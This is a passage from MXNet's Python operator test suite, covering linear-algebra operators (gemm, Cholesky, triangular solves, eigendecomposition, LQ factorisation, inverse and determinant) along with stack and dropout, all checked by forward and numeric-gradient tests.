check_grad(test_gemm, [data_in1, data_in2, data_in3])
res_gemm = 4. * np.dot(data_in1_t, data_in1) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in3])
res_gemm = 4. * np.dot(data_in1, data_in1_t) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in4])
# Check batch of gemm.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
c = rep_3x(data_in4, 2, 2)
r = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
r = rep_3x(r, 2, 2)
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [a, b, c], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b, c])
# Check for different axis that describes matrix rows.
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
c2 = np.copy(np.swapaxes(c, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = 0)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
c2 = np.copy(np.swapaxes(c, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = -3)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
# Check gemm2 operator same way as gemm.
res_gemm = 4. * np.dot(data_in1, data_in2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in1)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
res_gemm = 4. * np.dot(data_in1, data_in1_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
# Check batch of gemm2.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
r = rep_3x(4. * np.dot(data_in1, data_in2), 2, 2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [a, b], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b])
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = 0)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = -3)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
# Test gemm separately from other la-operators.
@with_seed()
def test_gemm():
_gemm_test_helper(np.float64, True)
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "0"
_gemm_test_helper(np.float32, False, rtol_fw = 1e-5, atol_fw = 1e-7)
if default_context().device_type == 'gpu':
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "1"
_gemm_test_helper(np.float32, False, rtol_fw = 2e-5, atol_fw = 2e-7)
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "0"
# Helper functions for test_laop
def _make_symm_symbol(a, ndims):
assert ndims >= 2
tr_shape = list(range(ndims))
tr_shape[-1] = ndims-2
tr_shape[-2] = ndims-1
tr_shape = tuple(tr_shape)
return 0.5 * (a + mx.sym.transpose(a, axes=tr_shape))
def _make_triangle_symm(a, ndims, m, lower, dtype=np.float32):
assert ndims >= 2
# The last two dimensions must both be m
# Create mask for lower triangle and diagonal
index = mx.sym.arange(start=0, stop=m, step=1, dtype=np.int32)
lt_mask = mx.sym.one_hot(index, depth=m, dtype=dtype)
for j in range(1, m):
part1 = mx.sym.zeros(shape=(j, m), dtype=dtype)
index = mx.sym.arange(start=0, stop=m-j, step=1, dtype=np.int32)
part2 = mx.sym.one_hot(index, depth=m, dtype=dtype)
lt_mask = lt_mask + mx.sym.concat(*[part1, part2], dim=0)
if not lower:
lt_mask = mx.sym.reshape(lt_mask, shape=(m, m))
lt_mask = mx.sym.transpose(lt_mask, axes=(1, 0))
shp = tuple([1]*(ndims-2) + [m, m])
lt_mask = mx.sym.reshape(lt_mask, shape=shp)
return mx.sym.broadcast_mul(a, lt_mask)
# @ankkhedia: Getting rid of fixed seed as flakiness could not be reproduced
# tracked at https://github.com/apache/incubator-mxnet/issues/11718
@xfail_when_nonstandard_decimal_separator
@with_seed()
def test_laop():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 2e-6
rtol_bw = 1e-5
atol_bw = 1e-5
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
def check_fw_grad(sym, location, expected):
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
if grad_check == 1:
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
matrix = np.array([[9., 3., -6., 12.],
[3., 26., -7., -11.],
[-6., -7., 9., 7.],
[12., -11., 7., 65.]])
trian = np.array([[3., 0., 0., 0.],
[1., 5., 0., 0.],
[-2., -1., 2., 0.],
[4., -3., 6., 2.]])
pow = np.array([[2., 1., 1., 1.],
[1., 4., 1., 1.],
[1., 1., 8., 1.],
[1., 1., 1., 16.]])
inv = np.array([[8.95/3., 0.05/3., 2.65, -2.5/3.],
[0.05/3., 0.05, 0.05, 0.],
[2.65, 0.05, 2.5, -0.75],
[-2.5/3., 0., -0.75, 0.25]])
ident = np.eye(4)
shape = (4, 4, 1, 1)
ones = mx.nd.ones(shape).asnumpy()
for lower in [True, False]:
upper = not lower
# Tests with trivial 1x1 matrices.
data_in = np.random.uniform(1, 10, shape)
# test potrf
# Note: Have to symmetrize input, for gradient test to work
res_potrf = np.sqrt(data_in)
test_potrf = mx.sym.linalg.potrf(data1, lower=lower)
check_fw_grad(test_potrf, [data_in], [res_potrf])
# test potri
res_potri = np.divide(ones, data_in * data_in)
test_potri = mx.sym.linalg.potri(data1, lower=lower)
check_fw_grad(test_potri, [data_in], [res_potri])
# test trsm
trian_in = data_in * 7.
test_trsm = mx.sym.linalg.trsm(data1, data2, alpha=7., lower=lower)
check_fw_grad(test_trsm, [trian_in, data_in], [ones])
# test trmm
trian_in = np.divide(ones, trian_in)
test_trmm = mx.sym.linalg.trmm(data1, data2, alpha=7., transpose=True,
rightside=True, lower=lower)
check_fw_grad(test_trmm, [trian_in, data_in], [ones])
# test sumlogdiag
res_sumlogdiag = np.reshape(np.log(data_in), (4, 4))
test_sumlogdiag = mx.sym.linalg.sumlogdiag(data1)
check_fw_grad(test_sumlogdiag, [data_in], [res_sumlogdiag])
# more elaborate example of Cholesky factorization
low_trian = trian
if upper:
trian = np.transpose(trian)
# test potrf
test_potrf = mx.sym.linalg.potrf(_make_symm_symbol(data1, ndims=4), lower=lower)
a = rep_3x(matrix, 4, 4)
r = rep_3x(trian, 4, 4)
check_fw_grad(test_potrf, [a], [r])
#test potri
data1_ltri = _make_triangle_symm(
data1, ndims=4, m=4, lower=lower, dtype=dtype)
test_potri = mx.sym.linalg.potri(data1_ltri, lower=lower)
a = rep_3x(trian, 4, 4)
r = rep_3x(inv, 4, 4)
check_fw_grad(test_potri, [a], [r])
# test trsm
test_trsm = mx.sym.linalg.trsm(data1_ltri, data2, alpha=7., transpose=upper, lower=lower)
b = rep_3x(matrix, 4, 4)
r = rep_3x(7. * np.transpose(low_trian), 4, 4)
check_fw_grad(test_trsm, [a, b], [r])
test_trsm2 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-2., rightside=True, transpose=lower, lower=lower)
r = rep_3x(-2. * low_trian, 4, 4)
check_fw_grad(test_trsm2, [a, b], [r])
test_trsm3 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=0.5, transpose=lower, lower=lower)
b = rep_3x(np.transpose(low_trian), 4, 4)
r = rep_3x(0.5 * ident, 4, 4)
check_fw_grad(test_trsm3, [a, b], [r])
test_trsm4 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-0.5, rightside=True, transpose=upper, lower=lower)
b = rep_3x(low_trian, 4, 4)
r = rep_3x(-0.5 * ident, 4, 4)
check_fw_grad(test_trsm4, [a, b], [r])
# test trmm
test_trmm = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=7., transpose=True, rightside=True, lower=lower)
a = [a, rep_3x(matrix, 4, 4)]
r = rep_3x(7. * np.dot(matrix, trian.T), 4, 4)
check_fw_grad(test_trmm, a, [r])
test_trmm2 = mx.sym.linalg.trmm(data1_ltri, data2, alpha=-2., lower=lower)
r = rep_3x(-2. * np.dot(trian, matrix), 4, 4)
check_fw_grad(test_trmm2, a, [r])
test_trmm3 = mx.sym.linalg.trmm(data1_ltri, data2, rightside=True, lower=lower)
r = rep_3x(np.dot(matrix, trian), 4, 4)
check_fw_grad(test_trmm3, a, [r])
test_trmm4 = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=1.2, transpose=True, lower=lower)
r = rep_3x(1.2 * np.dot(trian.T, matrix), 4, 4)
check_fw_grad(test_trmm4, a, [r])
# test sumlogdiag
r = np.reshape(np.tile(10. * np.log(np.array([2.])), 3), (3,))
check_fw_grad(test_sumlogdiag, [rep_3x(pow, 4, 4)], [r])
# Tests for operators linalg.syrk, linalg.gelqf
def _gelqf_combined_symbol(a):
q, l = mx.sym.linalg.gelqf(a)
q_qt = mx.sym.linalg.syrk(q, transpose=False, alpha=1., name='Q_times_Qt')
l_q = mx.sym.linalg.trmm(l, q, alpha=1., name='L_times_Q')
return mx.sym.Group([q_qt, l_q])
# NOTE: If we leave the unused output dangling, things break if dtype=np.float64. Namely, the
# backward gradient for the unused output is of dtype np.float32 then.
# ==> Very annoying!
def _gelqf_first_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(l), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(q, bogus_scal)
def _gelqf_second_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(q), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(l, bogus_scal)
def _syevd_combined_symbol(a):
u, lam = mx.sym.linalg.syevd(a)
u_ut = mx.sym.linalg.syrk(u, transpose=False, alpha=1., name='U_times_Ut')
lam_u = mx.sym.broadcast_mul(mx.sym.reshape(lam, shape=(-2, 1)), u)
ut_lam_u = mx.sym.linalg.gemm2(u, lam_u, alpha=1., transpose_a=True,
transpose_b=False, name='Ut_L_U')
return mx.sym.Group([u_ut, ut_lam_u])
@with_seed()
def test_laop_2():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
# Tests for linalg.syrk
mnalpha_lst = [(2, 3, 1.), (5, 3, -2.), (1, 6, 5.), (3, 3, 0.5), (4, 1, 10.), (1, 1, 1.)]
for m, n, alpha in mnalpha_lst:
#print('syrk: m={}, n={}, alpha={}'.format(m, n, alpha))
data_in1 = np.random.uniform(1, 10, (m, n))
res_syrk1 = alpha * np.dot(data_in1, data_in1.T)
test_syrk1 = mx.sym.linalg.syrk(data1, transpose=False, alpha=alpha)
check_fw(test_syrk1, [data_in1], [res_syrk1])
if grad_check == 1:
check_grad(test_syrk1, [data_in1])
res_syrk2 = alpha * np.dot(data_in1.T, data_in1)
test_syrk2 = mx.sym.linalg.syrk(data1, transpose=True, alpha=alpha)
check_fw(test_syrk2, [data_in1], [res_syrk2])
if grad_check == 1:
check_grad(test_syrk2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
r1_batch = rep_3x(res_syrk1, m, m)
check_fw(test_syrk1, [a_batch], [r1_batch])
if grad_check == 1:
check_grad(test_syrk1, [a_batch])
r2_batch = rep_3x(res_syrk2, n, n)
check_fw(test_syrk2, [a_batch], [r2_batch])
if grad_check == 1:
check_grad(test_syrk2, [a_batch])
# Tests for linalg.gelqf
# Currently disabled on GPU as they need cuda8
# and MxNet builds use cuda 7.5
if not (default_context() == mx.cpu()):
return
test_gelqf2 = _gelqf_combined_symbol(data1) # Outputs (dot(Q, Q.T), dot(L, Q))
test_gelqf_q = _gelqf_first_output(data1) # Output Q (L is not dangling)
test_gelqf_l = _gelqf_second_output(data1) # Output L (Q is not dangling)
mn_lst = [(4, 4), (1, 1), (5, 20), (1, 10), (15, 50)]
for m, n in mn_lst:
#print('gelqf: m={}, n={}'.format(m, n))
data_in1 = np.random.normal(0., 10., (m, n))
res_eye = np.eye(m)
res_a = data_in1
check_fw(test_gelqf2, [data_in1], [res_eye, res_a])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [data_in1])
# A => L
check_grad(test_gelqf_l, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
reye_batch = rep_3x(res_eye, m, m)
ra_batch = a_batch
check_fw(test_gelqf2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [a_batch])
# A => L
check_grad(test_gelqf_l, [a_batch])
# Tests for operator linalg.syevd
def _syevd_first_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(lam), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(u, bogus_scal)
def _syevd_second_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(u), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(lam, bogus_scal)
def _syevd_forward(a):
lam, ut = np.linalg.eig(a)
ind = np.argsort(lam)
lam = lam[ind]
u = ut[:, ind].T
for i in range(0, a.shape[0]):
_syevd_forw_eigvec_sign(u[i])
return u, lam
def _syevd_forw_eigvec_sign(v):
ind = np.argmax(np.abs(v))
if v[ind] < 0.:
v[:] = -v
def _syevd_backward(grad_u, grad_l, u, l):
n = l.size
assert grad_l.size == n
assert grad_u.shape == (n, n)
assert u.shape == (n, n)
temp = np.dot(grad_u, u.T)
temp2 = np.diag(grad_l)
for i in range(1, n):
for j in range(0, i):
denom = 2. * (l[i] - l[j])
elem = (temp[i, j] - temp[j, i])/denom
temp2[i, j] = elem
temp2[j, i] = elem
temp3 = np.dot(u.T, temp2)
return np.dot(temp3, u)
# Seed set because the test is not robust enough to operate on random data
@with_seed(1896893923)
def test_laop_3():
# Currently disabled on GPU as syevd needs cuda8
# and MxNet builds use cuda 7.5
if not (default_context() == mx.cpu()):
return
dtype = np.float64
rtol_fw = 1e-6
atol_fw = 1e-6
num_eps = 1e-4
rtol_bw = 1e-2
atol_bw = 1e-2
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol_fw, atol=atol_fw, dtype=dtype)
# Tests for linalg.syevd
test_syevd2 = _syevd_combined_symbol(data1) # Outputs (U U^T, U^T (diag L) U)
data1_s2 = _make_symm_symbol(data1, ndims=2)
test_syevd_u_2 = _syevd_first_output(data1_s2)
test_syevd_l_2 = _syevd_second_output(data1_s2)
data1_s4 = _make_symm_symbol(data1, ndims=4)
test_syevd_u_4 = _syevd_first_output(data1_s4)
test_syevd_l_4 = _syevd_second_output(data1_s4)
n_lst = [4, 1, 2, 10, 14]
for n in n_lst:
#print('\n** syevd: n={}'.format(n))
data_in1 = np.random.normal(0., 10., (n, n))
data_in1 = 0.5 * (data_in1 + data_in1.T)
res_eye = np.eye(n)
res_a = data_in1
check_fw(test_syevd2, [data_in1], [res_eye, res_a])
# Check backward
grad_u = np.random.normal(0., 2., (n, n))
grad_l = np.random.normal(0., 2., (n,))
bw_u, bw_l = _syevd_forward(data_in1)
grad_a = _syevd_backward(grad_u, grad_l, bw_u, bw_l)
check_bw(mx.sym.linalg.syevd(data1), [data_in1], [grad_u, grad_l], [grad_a])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_2, [data_in1])
# A => L
check_grad(test_syevd_l_2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, n, n)
reye_batch = rep_3x(res_eye, n, n)
ra_batch = a_batch
check_fw(test_syevd2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_4, [a_batch])
# A => L
check_grad(test_syevd_l_4, [a_batch])
# @piyushghai - Removing the fixed seed for this test.
# Issue for flakiness is tracked at - https://github.com/apache/incubator-mxnet/issues/11721
@with_seed()
def test_laop_4():
# Currently disabled on GPU as syevd needs cuda8
# and MxNet builds use cuda 7.5
if not (default_context() == mx.cpu()):
return
rtol_fw = 1e-6
atol_fw = 1e-6
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected, dtype :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
a_np = np.array([[1., 2.], [2., 4.]])
u_np = np.array([[0.89442718, -0.44721359], [0.44721359, 0.89442718]])
l_np = np.array([0., 5.])
test_syevd = mx.sym.linalg.syevd(data1)
# float64
#print('float64')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float64)
# float32
#print('float32')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float32)
def test_laop_5():
# tests for diagonal and triangular matrix extraction and generation
data = mx.symbol.Variable('data')
# test complete range of small matrices to cover corner cases
for n in range(1, 5):
# test batched and non-batched processing
for b in range(3):
shape = (n, n) if b == 0 else (b, n, n)
data_in = np.random.uniform(1, 10, shape)
# test all legal offsets of the diagonal
for offs in range(1-n, n):
# test extraction of diagonal
test_diag = mx.sym.linalg.extractdiag(data, offset=offs)
res_diag = np.diagonal(data_in, offset=offs) if b==0 else np.diagonal(data_in, axis1=1, axis2=2, offset=offs)
check_symbolic_forward(test_diag, [data_in], [res_diag])
check_numeric_gradient(test_diag, [data_in])
# test generation of diagonal matrix
test_diag2 = mx.sym.linalg.makediag(data, offset=offs)
res_diag2 = None
if b == 0:
res_diag2 = np.diagflat(res_diag, k=offs)
else:
for i in range(b):
res = np.reshape(np.diagflat(res_diag[i], k=offs), (1, n, n))
res_diag2 = res if res_diag2 is None else np.concatenate((res_diag2, res), axis=0)
check_symbolic_forward(test_diag2, [res_diag], [res_diag2])
check_numeric_gradient(test_diag2, [res_diag])
# check both settings for parameter "lower" in case of zero offset
lower_vals = [True] if offs != 0 else [True, False]
for lower in lower_vals:
# test extraction of triangle by doing a full roundtrip as the intermediate extracted
# triangle has different orderings than numpy.
test_trian = mx.sym.linalg.extracttrian(data, offset=offs, lower=lower)
test_trian = mx.sym.linalg.maketrian(test_trian, offset=offs, lower=lower)
extracts_lower = (offs < 0) or ((offs == 0) and lower)
res_trian = None
if b == 0:
res_trian = np.tril(data_in, offs) if extracts_lower else np.triu(data_in, offs)
else:
for i in range(b):
res = np.tril(data_in[i], offs) if extracts_lower else np.triu(data_in[i], offs)
res = np.reshape(res, (1, n, n))
res_trian = res if res_trian is None else np.concatenate((res_trian, res), axis=0)
check_symbolic_forward(test_trian, [data_in], [res_trian])
check_numeric_gradient(test_trian, [data_in])
# Tests for linalg.inverse
@with_seed()
@pytest.mark.skip(reason="Test crashes https://github.com/apache/incubator-mxnet/issues/15975")
def test_laop_6():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-4
atol_bw = 1e-6
data = mx.symbol.Variable('data')
check_fw = lambda sym, location, expected:\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
## det(I + dot(v, v.T)) = 1 + dot(v.T, v) >= 1, so it's always invertible;
## det is away from zero, so the value of logdet is stable
v = np.random.random(4)
a = np.eye(4) + np.outer(v, v)
a = np.tile(a, (3, 1, 1))
permute_mat = np.eye(4)[[1, 0, 2, 3]]
# test matrix inverse
r = np.eye(4)
r = np.tile(r, (3, 1, 1))
test_inverse = mx.sym.linalg.inverse(data)
test_eye = mx.sym.linalg.gemm2(data, test_inverse)
check_fw(test_eye, [a], [r])
check_grad(test_inverse, [a])
# test matrix determinant
# det
r = np.linalg.det(a)
test_det = mx.sym.linalg.det(data)
check_fw(test_det, [a], [r])
check_grad(test_det, [a])
# test slogdet
r1 = np.array([1., 1., 1.])
r2 = np.log(np.abs(np.linalg.det(a)))
test_sign, test_logabsdet = mx.sym.linalg.slogdet(data)
check_fw(test_sign, [a], [r1])
check_fw(test_sign, [np.dot(a, permute_mat)], [-r1])
check_fw(test_logabsdet, [a], [r2])
check_grad(test_logabsdet, [a])
@with_seed()
def test_stack():
for _ in range(100):
ndim = random.randint(1, 5)
axis = random.randint(0, ndim)
if random.randint(0, 1):
axis = axis - ndim - 1
nin = random.randint(1, 3)
dshape = [random.randint(1, 5) for _ in range(ndim)]
inputs = [np.random.uniform(size=dshape) for _ in range(nin)]
output = np.stack(inputs, axis=axis)
sym_ins = [mx.sym.var('x%d'%i) for i in range(nin)]
out = mx.sym.stack(*sym_ins, axis=axis)
check_symbolic_forward(out, inputs, [output])
check_numeric_gradient(out, inputs)
## TODO: test fails intermittently when cudnn on. temporarily disabled cudnn until gets fixed.
## tracked at https://github.com/apache/incubator-mxnet/issues/14288
@with_seed()
def test_dropout():
def zero_count(array, ratio):
zeros = 0
for i in array:
if i == 0:
zeros += 1
elif math.isnan(i):
assert ratio == 1 # Only valid for ratio = 1
zeros += 1
return zeros
def check_correctness(executor, input, ratio):
input = input.ravel()
output = executor.outputs[0].asnumpy().ravel()
input_sum = np.sum(input)
output_sum = np.sum(output)
# Make sure input zeroes are none (test data setup check)
assert zero_count(input, ratio) == 0
# count number of zeroes in output
output_zeroes = zero_count(output, ratio)
# Hopefully should be within ratio/2 %
error = abs(output_sum - input_sum) / input_sum
if ratio == 1.0:
assert output_zeroes == len(input)
elif ratio > 0.2:
assert output_zeroes > 0
assert error < (ratio/2)
elif ratio == 0:
assert output_zeroes == 0
def check_dropout_ratio(ratio, shape, cudnn_off=True):
# test dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, cudnn_off=cudnn_off)
exe = y.simple_bind(ctx=default_context(), data=shape)
if ratio == 1:
max_value = float('nan')
else:
max_value = 1 if ratio == 0 else 1/ratio
if ratio == 1:
min_value = float('nan')
else:
min_value = 1 if ratio == 0 else 0
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
if not math.isnan(max_value):
assert exe.outputs[0].asnumpy().max() > 0
else:
assert math.isnan(exe.outputs[0].asnumpy().max())
if not math.isnan(min_value):
assert exe.outputs[0].asnumpy().min() == min_value
else:
assert math.isnan(exe.outputs[0].asnumpy().min())
check_correctness(exe, exe.arg_arrays[0].asnumpy(), ratio)
if ratio == 0.5:
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert (exe.outputs[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
exe.backward([mx.nd.ones(shape)], is_train=False)
assert (exe.grad_arrays[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
# test permanent dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, mode='always', cudnn_off=cudnn_off)
exe = y.simple_bind(ctx=default_context(), data=shape)
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)], is_train=False)
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
def get_slice(x, axis, idx):
ix = ()
for i in range(x.ndim):
if i == axis:
ix += (idx,)
else:
ix += (slice(None, None, None),)
return x[ix]
def check_dropout_axes(ratio, shape, axes, cudnn_off=True):
compactshape = list(shape)
for axis in axes:
compactshape[axis] = 1
compactx = mx.random.uniform(shape=tuple(compactshape))
broadcastx = compactx.broadcast_to(shape)
dropouty = mx.nd.Dropout(broadcastx, p=ratio, axes=axes, cudnn_off=cudnn_off)
for axis in axes:
target = get_slice(dropouty, axis, 0).asnumpy()
for i in range(1, shape[axis]):
assert(get_slice(dropouty, axis, i).asnumpy() == target).all()
def check_passthrough(ratio, shape, cudnn_off=True):
# test inference_mode forward and then backward
a = mx.random.uniform(shape=shape)
a.attach_grad()
with mx.autograd.record(train_mode=False):
b = mx.nd.Dropout(a, ratio, cudnn_off=cudnn_off) # dropout acts as identity
b.backward()
assert_almost_equal(a.grad.asnumpy(), mx.nd.ones_like(b).asnumpy())
shape = (100, 100)
check_dropout_ratio(0.5, shape)
check_dropout_ratio(0.0, shape)
check_dropout_ratio(1.0, shape)
check_dropout_ratio(0.75, shape)
check_dropout_ratio(0.25, shape)
# check_dropout_ratio(0.5, shape, cudnn_off=False)
# check_dropout_ratio(0.0, shape, cudnn_off=False)
# check_dropout_ratio(1.0, shape, cudnn_off=False)
# check_dropout_ratio(0.75, shape, cudnn_off=False)
# check_dropout_ratio(0.25, shape, cudnn_off=False)
check_passthrough(0.5, shape)
check_passthrough(0.0, shape)
check_passthrough(1.0, shape)
# check_passthrough(0.5, shape, cudnn_off=False)
# check_passthrough(0.0, shape, cudnn_off=False)
# check_passthrough(1.0, shape, cudnn_off=False)
nshape = (10, 10, 10, 10)
with mx.autograd.train_mode():
check_dropout_axes(0.25, nshape, axes = (0,))
check_dropout_axes(0.25, nshape, axes = (1,))
check_dropout_axes(0.25, nshape, axes = (2,))
check_dropout_axes(0.25, nshape, axes = (3,))
check_dropout_axes(0.25, nshape, axes = (0, 1))
check_dropout_axes(0.25, nshape, axes = (0, 2))
check_dropout_axes(0.25, nshape, axes = (0, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2))
check_dropout_axes(0.25, nshape, axes = (1, 3))
check_dropout_axes(0.25, nshape, axes = (2, 3))
check_dropout_axes(0.25, nshape, axes = (0, 1, 2))
check_dropout_axes(0.25, nshape, axes = (0, 2, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2, 3))
# check_dropout_axes(0.25, nshape, axes = (0,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (2,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (3,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 1), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 2), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1, 2), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (2, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 1, 2), cudnn_off=False)
